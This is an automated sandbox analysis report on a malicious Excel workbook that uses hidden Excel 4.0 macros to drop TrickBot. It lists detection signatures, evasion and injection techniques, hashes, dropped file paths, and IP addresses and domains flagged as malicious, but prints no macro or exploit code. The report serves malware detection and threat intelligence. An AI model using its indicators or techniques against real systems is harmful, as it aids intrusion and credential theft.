Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189 (renamed file extension from 29189 to xls) |
Analysis ID: | 355607 |
MD5: | 7810830918f82b2acdcdb05d2d404bad |
SHA1: | 095201dab7b66c1268e3921356a2870ad1dc628c |
SHA256: | c217faa8b517c65418d18c7b14ccb3c307cdbd0b477a7d09332aad25dcd52d81 |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 TrickBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Source: | Code function: |
Compliance: |
---|
Uses insecure TLS / SSL version for HTTPS connection | Show sources |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) | Show sources |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements | Show sources |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | System Network Configuration Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Metadefender | Browse | ||
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
11% | Metadefender | Browse | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
5% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
ident.me | 176.58.123.25 | true | false |
| unknown |
chipmania.it | 185.81.0.78 | true | false |
| unknown |
www.chipmania.it | unknown | unknown | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.202.191.164 | unknown | Reserved | 398019 | DYNUUS | true | |
45.155.173.242 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | true | |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
194.5.249.156 | unknown | Romania | 64398 | NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | false | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true | |
94.140.114.136 | unknown | Latvia | 43513 | NANO-ASLV | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355607 |
Start date: | 20.02.2021 |
Start time: | 03:19:19 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189 (renamed file extension from 29189 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/11@3/6 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
03:19:40 | API Interceptor | |
03:19:40 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
142.202.191.164 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
45.155.173.242 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
185.81.0.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ident.me | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DYNUUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
COMBAHTONcombahtonGmbHDE | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SERVERPLAN-ASIT | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8c4a22651d328568ec66382a84fc505f | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.066589575667779 |
Encrypted: | false |
SSDEEP: | 6:kKo4PbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:5W3kPlE99SNxAhUeo+aKt |
MD5: | 46ABC96344F13B0AFD895852E597F1B2 |
SHA1: | E8B264BB149858AEF57245C350FD93636B8736C5 |
SHA-256: | E821AE09E22728DC49926ADEA5C6684D93A86343956BE54515FFD6CCA30944E2 |
SHA-512: | CF4ECB5D0F6CC69A071650368E2B990136A8CEC81EDF151267B5E6332DFC8C09BCFFE1D5CB75FF9E549EEA47FE3DF9211123B1CCE1A7A362B83E46242D8E7BAA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
